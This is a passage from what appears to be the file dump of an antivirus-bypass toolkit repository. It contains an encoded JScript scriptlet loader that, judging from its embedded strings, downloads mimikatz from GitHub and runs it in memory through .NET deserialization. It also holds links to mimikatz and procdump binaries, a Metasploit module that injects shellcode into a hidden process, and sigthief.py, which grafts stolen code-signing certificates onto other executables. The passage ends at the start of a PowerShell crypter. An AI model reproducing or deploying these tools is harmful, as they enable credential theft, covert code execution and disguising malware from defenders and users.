235 | "cmVkQWNjZXNzAGR3U2hhcmVNb2RlAGxwU2VjdXJpdHlBdHRyaWJ1dGVzAGR3Q3JlYXRpb25EaXNw"+
236 | "b3NpdGlvbgBkd0ZsYWdzQW5kQXR0cmlidXRlcwBoVGVtcGxhdGVGaWxlAGlucHV0AHVybABmaWxl"+
237 | "UGF0aABmaWxlQnl0ZXMAcmVhZGVyAGxwU3RhcnRBZGRyAHNpemUAZmxBbGxvY2F0aW9uVHlwZQBm"+
238 | "bFByb3RlY3QAaE1vZHVsZQBwcm9jTmFtZQBscFRocmVhZEF0dHJpYnV0ZXMAZHdTdGFja1NpemUA"+
239 | "bHBTdGFydEFkZHJlc3MAcGFyYW0AZHdDcmVhdGlvbkZsYWdzAGxwVGhyZWFkSWQAaEhhbmRsZQBk"+
240 | "d01pbGxpc2Vjb25kcwBTeXN0ZW0uU2VjdXJpdHkuUGVybWlzc2lvbnMAU2VjdXJpdHlQZXJtaXNz"+
241 | "aW9uQXR0cmlidXRlAFNlY3VyaXR5QWN0aW9uAFN5c3RlbS5SdW50aW1lLkNvbXBpbGVyU2Vydmlj"+
242 | "ZXMAQ29tcGlsYXRpb25SZWxheGF0aW9uc0F0dHJpYnV0ZQBSdW50aW1lQ29tcGF0aWJpbGl0eUF0"+
243 | "dHJpYnV0ZQBuZXRrYXR6MwBJbnRQdHIAVG9JbnQ2NABTeXN0ZW0uUnVudGltZS5JbnRlcm9wU2Vy"+
244 | "dmljZXMARGxsSW1wb3J0QXR0cmlidXRlAGtlcm5lbDMyLmRsbABNaWNyb3NvZnQuV2luMzIuU2Fm"+
245 | "ZUhhbmRsZXMAU2FmZUZpbGVIYW5kbGUARmlsZVN0cmVhbQBGaWxlQWNjZXNzAFN5c3RlbS5UZXh0"+
246 | "AEVuY29kaW5nAEdldEVuY29kaW5nAFN0cmVhbVdyaXRlcgBzZXRfQXV0b0ZsdXNoAENvbnNvbGUA"+
247 | "VGV4dFdyaXRlcgBTZXRPdXQAQnl0ZQBNZW1vcnlTdHJlYW0AV3JpdGUAUmVhZABUb0FycmF5AElE"+
248 | "aXNwb3NhYmxlAERpc3Bvc2UAU3lzdGVtLk5ldABXZWJDbGllbnQARG93bmxvYWREYXRhAFN5c3Rl"+
249 | "bS5JTy5Db21wcmVzc2lvbgBaaXBBcmNoaXZlAFN5c3RlbS5Db2xsZWN0aW9ucy5PYmplY3RNb2Rl"+
250 | "bABSZWFkT25seUNvbGxlY3Rpb25gMQBaaXBBcmNoaXZlRW50cnkAZ2V0X0VudHJpZXMAU3lzdGVt"+
251 | "LkNvbGxlY3Rpb25zLkdlbmVyaWMASUVudW1lcmF0b3JgMQBHZXRFbnVtZXJhdG9yAGdldF9DdXJy"+
252 | "ZW50AGdldF9GdWxsTmFtZQBTdHJpbmcAb3BfRXF1YWxpdHkAZ2V0X1NpemUAT3BlbgBTeXN0ZW0u"+
253 | "Q29sbGVjdGlvbnMASUVudW1lcmF0b3IATW92ZU5leHQARXhjZXB0aW9uAGdldF9Jbm5lckV4Y2Vw"+
254 | "dGlvbgBaZXJvAE1hcnNoYWwAQ29weQBUb0ludDMyAFR5cGUAUnVudGltZVR5cGVIYW5kbGUAR2V0"+
255 | "VHlwZUZyb21IYW5kbGUAUHRyVG9TdHJ1Y3R1cmUAU2l6ZU9mAFJlYWRJbnQxNgBSZWFkSW50MzIA"+
256 | "V3JpdGVJbnQzMgBSZWFkSW50NjQAV3JpdGVJbnQ2NABQdHJUb1N0cmluZ0Fuc2kAb3BfRXhwbGlj"+
257 | "aXQAQWRkAEZpbGVNb2RlAFNlZWtPcmlnaW4AU2VlawBSZWFkVUludDMyAEZpbGUAUmVhZEFsbEJ5"+
258 | "dGVzAFJlYWRCeXRlcwBHQ0hhbmRsZQBHQ0hhbmRsZVR5cGUAQWxsb2MAQWRkck9mUGlubmVkT2Jq"+
259 | "ZWN0AEZyZWUAU3RydWN0TGF5b3V0QXR0cmlidXRlAExheW91dEtpbmQARmllbGRPZmZzZXRBdHRy"+
260 | "aWJ1dGUATWFyc2hhbEFzQXR0cmlidXRlAFVubWFuYWdlZFR5cGUARmxhZ3NBdHRyaWJ1dGUAa2Vy"+
261 | "bmVsMzIALmNjdG9yAFN5c3RlbS5TZWN1cml0eQBVbnZlcmlmaWFibGVDb2RlQXR0cmlidXRlAAAA"+
262 | "D0MATwBOAE8AVQBUACQAAIC1aAB0AHQAcABzADoALwAvAGcAaQB0AGgAdQBiAC4AYwBvAG0ALwBn"+
263 | "AGUAbgB0AGkAbABrAGkAdwBpAC8AbQBpAG0AaQBrAGEAdAB6AC8AcgBlAGwAZQBhAHMAZQBzAC8A"+
264 | "ZABvAHcAbgBsAG8AYQBkAC8AMgAuADEALgAxAC0AMgAwADEANwAxADIAMgAwAC8AbQBpAG0AaQBr"+
265 | "AGEAdAB6AF8AdAByAHUAbgBrAC4AegBpAHAAASF4ADYANAAvAG0AaQBtAGkAawBhAHQAegAuAGUA"+
266 | "eABlAAAlVwBpAG4AMwAyAC8AbQBpAG0AaQBrAGEAdAB6AC4AZQB4AGUAAAEAAACHWWlLXF4cQYJP"+
267 | "ySMsgyENAAi3elxWGTTgiQIGCAS1AQAAAgYJBAAAAEAEAgAAAAQDAAAABQACGBgIAgYYAwAACAoA"+
268 | "BxgOCQkJCQkJAwAAAQMgAAEGAAEdBRIRBAABAQ4DBhEQAwYRIAMGERgDBhEcBAYdESQDBh0FBCAB"+
269 | "AQ4FIAEBHQUHEAEBHgASFQMgAAIEIAARIAQgABEYBCAAERwFIAAdESQEIAAdBQMoAAIEKAARIAQo"+
270 | "ABEYBCgAERwFKAAdESQEKAAdBQIGBwIGBQMGERQCBgsDBh0DAwYRLAMgAA4DKAAOBAAAAAAHAAQY"+
271 | "GAkJCQQAARgOBQACGBgOCQAGGBgJGBgJGAUAAgkYCQUgAQERHQQgAQEIAyAACgQgAQEKBAcCGBgF"+
272 | "IAIBGAIHIAIBEjEROQUAARI9CAcgAgESERI9BCABAQIFAAEBEkkLBwUYEjESNRI9EkEHIAMBHQUI"+
273 | "CAcgAwgdBQgICgcFHQUSUQgdBQIFIAEdBQ4FIAEBEhEIIAAVEmEBEmUGFRJhARJlCCAAFRJpARMA"+
274 | "BhUSaQESZQQgABMABQACAg4OBCAAEhEEIAASdQgABAEdBQgYCAMgAAgHAAESfRGAgQYAAhwYEn0F"+
275 | "AAEIEn0FAAIGGAgEAAEIGAUAAgEYCAQAAQoYBQACARgKBAABDhhCBzASWR0FHQUSERIREl0SZRJ1"+
276 | "EgwIGBgKGBE0CBgIGBE0GBgYBwcHCAoYGAgYCQgYCBgYDhgIGA4YGBUSaQESZQIHCSADAQ4RgIUR"+
277 | "OQQKAREQByACCgoRgIkDIAAJBAoBESAECgERGAQKAREcBAoBESQFAAEdBQ4JBwUSNRIVCQgCCQcF"+
278 | "ElESFQkIAgIeAAUgAR0FCAkAAhGAkRwRgJUDIAAYCwcEHQURgJEeAB4ABAcCBwIEBwERIAQHAREY"+
279 | "BAcBERwFBwEdESQEBwEdBQYgAQERgJ0GIAEBEYCpAh4IBSABAR0DAwcBDgQBAAAACAEACAAAAAAA"+
280 | "HgEAAQBUAhZXcmFwTm9uRXhjZXB0aW9uVGhyb3dzAYCeLgGAhFN5c3RlbS5TZWN1cml0eS5QZXJt"+
281 | "aXNzaW9ucy5TZWN1cml0eVBlcm1pc3Npb25BdHRyaWJ1dGUsIG1zY29ybGliLCBWZXJzaW9uPTQu"+
282 | "MC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4ORUB"+
283 | "VAIQU2tpcFZlcmlmaWNhdGlvbgEAAHRMAAAAAAAAAAAAAI5MAAAAIAAAAAAAAAAAAAAAAAAAAAAA"+
284 | "AAAAAACATAAAAAAAAAAAAAAAAF9Db3JEbGxNYWluAG1zY29yZWUuZGxsAAAAAAD/JQAgABAAAAAA"+
285 | "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
286 | "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
287 | "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
288 | "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
289 | "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
290 | "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
291 | "AAAAAAAAAAAAAAAAAAAAAAEAEAAAABgAAIAAAAAAAAAAAAAAAAAAAAEAAQAAADAAAIAAAAAAAAAA"+
292 | "AAAAAAAAAAEAAAAAAEgAAABYYAAATAIAAAAAAAAAAAAATAI0AAAAVgBTAF8AVgBFAFIAUwBJAE8A"+
293 | "TgBfAEkATgBGAE8AAAAAAL0E7/4AAAEAAAAAAAAAAAAAAAAAAAAAAD8AAAAAAAAABAAAAAIAAAAA"+
294 | "AAAAAAAAAAAAAABEAAAAAQBWAGEAcgBGAGkAbABlAEkAbgBmAG8AAAAAACQABAAAAFQAcgBhAG4A"+
295 | "cwBsAGEAdABpAG8AbgAAAAAAAACwBKwBAAABAFMAdAByAGkAbgBnAEYAaQBsAGUASQBuAGYAbwAA"+
296 | "AIgBAAABADAAMAAwADAAMAA0AGIAMAAAACwAAgABAEYAaQBsAGUARABlAHMAYwByAGkAcAB0AGkA"+
297 | "bwBuAAAAAAAgAAAAMAAIAAEARgBpAGwAZQBWAGUAcgBzAGkAbwBuAAAAAAAwAC4AMAAuADAALgAw"+
298 | "AAAAPAANAAEASQBuAHQAZQByAG4AYQBsAE4AYQBtAGUAAABuAGUAdABrAGEAdAB6ADMALgBkAGwA"+
299 | "bAAAAAAAKAACAAEATABlAGcAYQBsAEMAbwBwAHkAcgBpAGcAaAB0AAAAIAAAAEQADQABAE8AcgBp"+
300 | "AGcAaQBuAGEAbABGAGkAbABlAG4AYQBtAGUAAABuAGUAdABrAGEAdAB6ADMALgBkAGwAbAAAAAAA"+
301 | "NAAIAAEAUAByAG8AZAB1AGMAdABWAGUAcgBzAGkAbwBuAAAAMAAuADAALgAwAC4AMAAAADgACAAB"+
302 | "AEEAcwBzAGUAbQBiAGwAeQAgAFYAZQByAHMAaQBvAG4AAAAwAC4AMAAuADAALgAwAAAAAAAAAAAA"+
303 | "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
304 | "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
305 | "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
306 | "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
307 | "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
308 | "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
309 | "AEAAAAwAAACgPAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
310 | "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
311 | "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
312 | "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
313 | "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
314 | "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
315 | "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
316 | "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"+
317 | "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB"+
318 | "DQAAAAQAAAAJFwAAAAkGAAAACRYAAAAGGgAAACdTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseSBM"+
319 | "b2FkKEJ5dGVbXSkIAAAACgsA";
320 | var entry_class = 'TestClass';
321 |
322 | try {
323 | setversion();
324 | var stm = base64ToStream(serialized_obj);
325 | var fmt = new ActiveXObject('System.Runtime.Serialization.Formatters.Binary.BinaryFormatter');
326 | var al = new ActiveXObject('System.Collections.ArrayList');
327 | var d = fmt.Deserialize_2(stm);
328 | al.Add(undefined);
329 | var o = d.DynamicInvoke(al.ToArray()).CreateInstance(entry_class);
330 |
331 | } catch (e) {
332 | debug(e.message);
333 | }
334 |
335 | }
336 |
337 | ]]>
338 | </script>
339 |
340 | </scriptlet>
--------------------------------------------------------------------------------
/tools/mimikatz/mimikatz_trunk_2.2.0.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TideSec/BypassAntiVirus/b12d39889bede1288f20f574d0f7a5bcd805c8da/tools/mimikatz/mimikatz_trunk_2.2.0.zip
--------------------------------------------------------------------------------
/tools/mimikatz/procdump.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TideSec/BypassAntiVirus/b12d39889bede1288f20f574d0f7a5bcd805c8da/tools/mimikatz/procdump.exe
--------------------------------------------------------------------------------
/tools/mimikatz/procdump64.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/TideSec/BypassAntiVirus/b12d39889bede1288f20f574d0f7a5bcd805c8da/tools/mimikatz/procdump64.exe
--------------------------------------------------------------------------------
/tools/mimikatz/shellcode_inject.rb:
--------------------------------------------------------------------------------
1 | require 'msf/core/post/common'
2 | require 'msf/core/post/windows/reflective_dll_injection'
3 |
4 | class MetasploitModule < Msf::Post
5 | include Msf::Post::Common
6 | include Msf::Post::Windows::ReflectiveDLLInjection
7 |
8 | def initialize(info={})
9 | super( update_info( info,
10 | 'Name' => 'Windows Manage Memory Shellcode Injection Module',
11 | 'Description' => %q{
12 | This module will inject into the memory of a process a specified shellcode.
13 | },
14 | 'License' => MSF_LICENSE,
15 | 'Author' => [ 'phra <https://iwantmore.pizza>' ],
16 | 'Platform' => [ 'win' ],
17 | 'SessionTypes' => [ 'meterpreter' ]
18 | ))
19 |
20 | register_options(
21 | [
22 | OptPath.new('SHELLCODE', [true, 'Path to the shellcode to execute']),
23 | OptInt.new('PID', [false, 'Process Identifier to inject of process to inject the shellcode. (0 = new process)', 0]),
24 | OptBool.new('CHANNELIZED', [true, 'Retrieve output of the process', true]),
25 | OptBool.new('INTERACTIVE', [true, 'Interact with the process', true]),
26 | OptBool.new('HIDDEN', [true, 'Spawn an hidden process', true]),
27 | OptEnum.new('BITS', [true, 'Set architecture bits', '64', ['32', '64']])
28 | ])
29 | end
30 |
31 | # Run Method for when run command is issued
32 | def run
33 |
34 | # syinfo is only on meterpreter sessions
35 | print_status("Running module against #{sysinfo['Computer']}") if not sysinfo.nil?
36 |
37 | # Set variables
38 | shellcode = IO.read(datastore['SHELLCODE'])
39 | pid = datastore['PID']
40 | bits = datastore['BITS']
41 | p = nil
42 | if bits == '64'
43 | bits = ARCH_X64
44 | else
45 | bits = ARCH_X86
46 | end
47 |
48 | if pid == 0 or not has_pid?(pid)
49 | p = create_temp_proc(bits)
50 | print_status("Spawned process #{p.pid}")
51 | else
52 | print_status("Opening process #{p.pid}")
53 | p = client.sys.process.open(pid.to_i, PROCESS_ALL_ACCESS)
54 | end
55 |
56 | if bits == ARCH_X64 and client.arch == ARCH_X86
57 | print_error("You are trying to inject to a x64 process from a x86 version of Meterpreter.")
58 | print_error("Migrate to an x64 process and try again.")
59 | return false
60 | elsif arch_check(bits, p.pid)
61 | inject(shellcode, p)
62 | end
63 | end
64 |
65 | # Checks the Architeture of a Payload and PID are compatible
66 | # Returns true if they are false if they are not
67 | def arch_check(bits, pid)
68 | # get the pid arch
69 | client.sys.process.processes.each do |p|
70 | # Check Payload Arch
71 | if pid == p["pid"]
72 | print_status("Process found checking Architecture")
73 | if bits == p['arch']
74 | print_good("Process is the same architecture as the payload")
75 | return true
76 | else
77 | print_error("The PID #{ p['arch']} and Payload #{bits} architectures are different.")
78 | return false
79 | end
80 | end
81 | end
82 | end
83 |
84 | # Creates a temp notepad.exe to inject payload in to given the payload
85 | # Returns process PID
86 | def create_temp_proc(bits)
87 | windir = client.sys.config.getenv('windir')
88 | # Select path of executable to run depending the architecture
89 | if bits == ARCH_X86 and client.arch == ARCH_X86
90 | cmd = "#{windir}\\System32\\notepad.exe"
91 | elsif bits == ARCH_X64 and client.arch == ARCH_X64
92 | cmd = "#{windir}\\System32\\notepad.exe"
93 | elsif bits == ARCH_X64 and client.arch == ARCH_X86
94 | cmd = "#{windir}\\Sysnative\\notepad.exe"
95 | elsif bits == ARCH_X86 and client.arch == ARCH_X64
96 | cmd = "#{windir}\\SysWOW64\\notepad.exe"
97 | end
98 |
99 | proc = client.sys.process.execute(cmd, nil, {
100 | 'Hidden' => datastore['HIDDEN'],
101 | 'Channelized' => datastore['CHANNELIZED'],
102 | 'Interactive' => datastore['INTERACTIVE']
103 | })
104 |
105 | return proc
106 | end
107 |
108 | def inject(shellcode, p)
109 | print_status("Injecting shellcode into process ID #{p.pid}")
110 | begin
111 | print_status("Allocating memory in process #{p.pid}")
112 | mem = inject_into_process(p, shellcode)
113 | print_status("Allocated memory at address #{"0x%.8x" % mem}, for #{shellcode.length} byte shellcode")
114 | p.thread.create(mem, 0)
115 | print_good("Successfully injected payload into process: #{p.pid}")
116 |
117 | if datastore['INTERACTIVE'] && datastore['CHANNELIZED'] && datastore['PID'] == 0
118 | print_status("Interacting")
119 | client.console.interact_with_channel(p.channel)
120 | elsif datastore['CHANNELIZED']
121 | print_status("Retrieving output")
122 | data = p.channel.read
123 | print_line(data) if data
124 | end
125 | rescue ::Exception => e
126 | print_error("Failed to inject Payload to #{p.pid}!")
127 | print_error(e.to_s)
128 | end
129 | end
130 | end
--------------------------------------------------------------------------------
/tools/mimikatz/sigthief.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python3
2 | # LICENSE: BSD-3
3 | # Copyright: Josh Pitts @midnite_runr
4 |
5 | import sys
6 | import struct
7 | import shutil
8 | import io
9 | from optparse import OptionParser
10 |
11 |
12 | def gather_file_info_win(binary):
13 | """
14 | Borrowed from BDF...
15 | I could just skip to certLOC... *shrug*
16 | """
17 | flItms = {}
18 | binary = open(binary, 'rb')
19 | binary.seek(int('3C', 16))
20 | flItms['buffer'] = 0
21 | flItms['JMPtoCodeAddress'] = 0
22 | flItms['dis_frm_pehdrs_sectble'] = 248
23 | flItms['pe_header_location'] = struct.unpack('<i', binary.read(4))[0]
24 | # Start of COFF
25 | flItms['COFF_Start'] = flItms['pe_header_location'] + 4
26 | binary.seek(flItms['COFF_Start'])
27 | flItms['MachineType'] = struct.unpack('<H', binary.read(2))[0]
28 | binary.seek(flItms['COFF_Start'] + 2, 0)
29 | flItms['NumberOfSections'] = struct.unpack('<H', binary.read(2))[0]
30 | flItms['TimeDateStamp'] = struct.unpack('<I', binary.read(4))[0]
31 | binary.seek(flItms['COFF_Start'] + 16, 0)
32 | flItms['SizeOfOptionalHeader'] = struct.unpack('<H', binary.read(2))[0]
33 | flItms['Characteristics'] = struct.unpack('<H', binary.read(2))[0]
34 | #End of COFF
35 | flItms['OptionalHeader_start'] = flItms['COFF_Start'] + 20
36 |
37 | #if flItms['SizeOfOptionalHeader']:
38 | #Begin Standard Fields section of Optional Header
39 | binary.seek(flItms['OptionalHeader_start'])
40 | flItms['Magic'] = struct.unpack('<H', binary.read(2))[0]
41 | flItms['MajorLinkerVersion'] = struct.unpack("!B", binary.read(1))[0]
42 | flItms['MinorLinkerVersion'] = struct.unpack("!B", binary.read(1))[0]
43 | flItms['SizeOfCode'] = struct.unpack("<I", binary.read(4))[0]
44 | flItms['SizeOfInitializedData'] = struct.unpack("<I", binary.read(4))[0]
45 | flItms['SizeOfUninitializedData'] = struct.unpack("<I",
46 | binary.read(4))[0]
47 | flItms['AddressOfEntryPoint'] = struct.unpack('<I', binary.read(4))[0]
48 | flItms['PatchLocation'] = flItms['AddressOfEntryPoint']
49 | flItms['BaseOfCode'] = struct.unpack('<I', binary.read(4))[0]
50 | if flItms['Magic'] != 0x20B:
51 | flItms['BaseOfData'] = struct.unpack('<I', binary.read(4))[0]
52 | # End Standard Fields section of Optional Header
53 | # Begin Windows-Specific Fields of Optional Header
54 | if flItms['Magic'] == 0x20B:
55 | flItms['ImageBase'] = struct.unpack('<Q', binary.read(8))[0]
56 | else:
57 | flItms['ImageBase'] = struct.unpack('<I', binary.read(4))[0]
58 | flItms['SectionAlignment'] = struct.unpack('<I', binary.read(4))[0]
59 | flItms['FileAlignment'] = struct.unpack('<I', binary.read(4))[0]
60 | flItms['MajorOperatingSystemVersion'] = struct.unpack('<H',
61 | binary.read(2))[0]
62 | flItms['MinorOperatingSystemVersion'] = struct.unpack('<H',
63 | binary.read(2))[0]
64 | flItms['MajorImageVersion'] = struct.unpack('<H', binary.read(2))[0]
65 | flItms['MinorImageVersion'] = struct.unpack('<H', binary.read(2))[0]
66 | flItms['MajorSubsystemVersion'] = struct.unpack('<H', binary.read(2))[0]
67 | flItms['MinorSubsystemVersion'] = struct.unpack('<H', binary.read(2))[0]
68 | flItms['Win32VersionValue'] = struct.unpack('<I', binary.read(4))[0]
69 | flItms['SizeOfImageLoc'] = binary.tell()
70 | flItms['SizeOfImage'] = struct.unpack('<I', binary.read(4))[0]
71 | flItms['SizeOfHeaders'] = struct.unpack('<I', binary.read(4))[0]
72 | flItms['CheckSum'] = struct.unpack('<I', binary.read(4))[0]
73 | flItms['Subsystem'] = struct.unpack('<H', binary.read(2))[0]
74 | flItms['DllCharacteristics'] = struct.unpack('<H', binary.read(2))[0]
75 | if flItms['Magic'] == 0x20B:
76 | flItms['SizeOfStackReserve'] = struct.unpack('<Q', binary.read(8))[0]
77 | flItms['SizeOfStackCommit'] = struct.unpack('<Q', binary.read(8))[0]
78 | flItms['SizeOfHeapReserve'] = struct.unpack('<Q', binary.read(8))[0]
79 | flItms['SizeOfHeapCommit'] = struct.unpack('<Q', binary.read(8))[0]
80 |
81 | else:
82 | flItms['SizeOfStackReserve'] = struct.unpack('<I', binary.read(4))[0]
83 | flItms['SizeOfStackCommit'] = struct.unpack('<I', binary.read(4))[0]
84 | flItms['SizeOfHeapReserve'] = struct.unpack('<I', binary.read(4))[0]
85 | flItms['SizeOfHeapCommit'] = struct.unpack('<I', binary.read(4))[0]
86 | flItms['LoaderFlags'] = struct.unpack('<I', binary.read(4))[0] # zero
87 | flItms['NumberofRvaAndSizes'] = struct.unpack('<I', binary.read(4))[0]
88 | # End Windows-Specific Fields of Optional Header
89 | # Begin Data Directories of Optional Header
90 | flItms['ExportTableRVA'] = struct.unpack('<I', binary.read(4))[0]
91 | flItms['ExportTableSize'] = struct.unpack('<I', binary.read(4))[0]
92 | flItms['ImportTableLOCInPEOptHdrs'] = binary.tell()
93 | #ImportTable SIZE|LOC
94 | flItms['ImportTableRVA'] = struct.unpack('<I', binary.read(4))[0]
95 | flItms['ImportTableSize'] = struct.unpack('<I', binary.read(4))[0]
96 | flItms['ResourceTable'] = struct.unpack('<Q', binary.read(8))[0]
97 | flItms['ExceptionTable'] = struct.unpack('<Q', binary.read(8))[0]
98 | flItms['CertTableLOC'] = binary.tell()
99 | flItms['CertLOC'] = struct.unpack("<I", binary.read(4))[0]
100 | flItms['CertSize'] = struct.unpack("<I", binary.read(4))[0]
101 | binary.close()
102 | return flItms
103 |
104 |
105 | def copyCert(exe):
106 | flItms = gather_file_info_win(exe)
107 |
108 | if flItms['CertLOC'] == 0 or flItms['CertSize'] == 0:
109 | # not signed
110 | print("Input file Not signed!")
111 | sys.exit(-1)
112 |
113 | with open(exe, 'rb') as f:
114 | f.seek(flItms['CertLOC'], 0)
115 | cert = f.read(flItms['CertSize'])
116 | return cert
117 |
118 |
119 | def writeCert(cert, exe, output):
120 | flItms = gather_file_info_win(exe)
121 |
122 | if not output:
123 | output = output = str(exe) + "_signed"
124 |
125 | shutil.copy2(exe, output)
126 |
127 | print("Output file: {0}".format(output))
128 |
129 | with open(exe, 'rb') as g:
130 | with open(output, 'wb') as f:
131 | f.write(g.read())
132 | f.seek(0)
133 | f.seek(flItms['CertTableLOC'], 0)
134 | f.write(struct.pack("<I", len(open(exe, 'rb').read())))
135 | f.write(struct.pack("<I", len(cert)))
136 | f.seek(0, io.SEEK_END)
137 | f.write(cert)
138 |
139 | print("Signature appended. \nFIN.")
140 |
141 |
142 | def outputCert(exe, output):
143 | cert = copyCert(exe)
144 | if not output:
145 | output = str(exe) + "_sig"
146 |
147 | print("Output file: {0}".format(output))
148 |
149 | open(output, 'wb').write(cert)
150 |
151 | print("Signature ripped. \nFIN.")
152 |
153 |
154 | def check_sig(exe):
155 | flItms = gather_file_info_win(exe)
156 |
157 | if flItms['CertLOC'] == 0 or flItms['CertSize'] == 0:
158 | # not signed
159 | print("Inputfile Not signed!")
160 | else:
161 | print("Inputfile is signed!")
162 |
163 |
164 | def truncate(exe, output):
165 | flItms = gather_file_info_win(exe)
166 |
167 | if flItms['CertLOC'] == 0 or flItms['CertSize'] == 0:
168 | # not signed
169 | print("Inputfile Not signed!")
170 | sys.exit(-1)
171 | else:
172 | print( "Inputfile is signed!")
173 |
174 | if not output:
175 | output = str(exe) + "_nosig"
176 |
177 | print("Output file: {0}".format(output))
178 |
179 | shutil.copy2(exe, output)
180 |
181 | with open(output, "r+b") as binary:
182 | print('Overwriting certificate table pointer and truncating binary')
183 | binary.seek(-flItms['CertSize'], io.SEEK_END)
184 | binary.truncate()
185 | binary.seek(flItms['CertTableLOC'], 0)
186 | binary.write(b"\x00\x00\x00\x00\x00\x00\x00\x00")
187 |
188 | print("Signature removed. \nFIN.")
189 |
190 |
191 | def signfile(exe, sigfile, output):
192 | flItms = gather_file_info_win(exe)
193 |
194 | cert = open(sigfile, 'rb').read()
195 |
196 | if not output:
197 | output = output = str(exe) + "_signed"
198 |
199 | shutil.copy2(exe, output)
200 |
201 | print("Output file: {0}".format(output))
202 |
203 | with open(exe, 'rb') as g:
204 | with open(output, 'wb') as f:
205 | f.write(g.read())
206 | f.seek(0)
207 | f.seek(flItms['CertTableLOC'], 0)
208 | f.write(struct.pack("<I", len(open(exe, 'rb').read())))
209 | f.write(struct.pack("<I", len(cert)))
210 | f.seek(0, io.SEEK_END)
211 | f.write(cert)
212 | print("Signature appended. \nFIN.")
213 |
214 |
215 | if __name__ == "__main__":
216 | usage = 'usage: %prog [options]'
217 | parser = OptionParser()
218 | parser.add_option("-i", "--file", dest="inputfile",
219 | help="input file", metavar="FILE")
220 | parser.add_option('-r', '--rip', dest='ripsig', action='store_true',
221 | help='rip signature off inputfile')
222 | parser.add_option('-a', '--add', dest='addsig', action='store_true',
223 | help='add signautre to targetfile')
224 | parser.add_option('-o', '--output', dest='outputfile',
225 | help='output file')
226 | parser.add_option('-s', '--sig', dest='sigfile',
227 | help='binary signature from disk')
228 | parser.add_option('-t', '--target', dest='targetfile',
229 | help='file to append signature to')
230 | parser.add_option('-c', '--checksig', dest='checksig', action='store_true',
231 | help='file to check if signed; does not verify signature')
232 | parser.add_option('-T', '--truncate', dest="truncate", action='store_true',
233 | help='truncate signature (i.e. remove sig)')
234 | (options, args) = parser.parse_args()
235 |
236 | # rip signature
237 | # inputfile and rip to outputfile
238 | if options.inputfile and options.ripsig:
239 | print("Ripping signature to file!")
240 | outputCert(options.inputfile, options.outputfile)
241 | sys.exit()
242 |
243 | # copy from one to another
244 | # inputfile and rip to targetfile to outputfile
245 | if options.inputfile and options.targetfile:
246 | cert = copyCert(options.inputfile)
247 | writeCert(cert, options.targetfile, options.outputfile)
248 | sys.exit()
249 |
250 | # check signature
251 | # inputfile
252 | if options.inputfile and options.checksig:
253 | check_sig(options.inputfile)
254 | sys.exit()
255 |
256 | # add sig to target file
257 | if options.targetfile and options.sigfile:
258 | signfile(options.targetfile, options.sigfile, options.outputfile)
259 | sys.exit()
260 |
261 | # truncate
262 | if options.inputfile and options.truncate:
263 | truncate(options.inputfile, options.outputfile)
264 | sys.exit()
265 |
266 | parser.print_help()
267 | parser.error("You must do something!")
268 |
269 |
--------------------------------------------------------------------------------
/tools/mimikatz/xencrypt.ps1:
--------------------------------------------------------------------------------
1 | # Xencrypt - PowerShell crypter
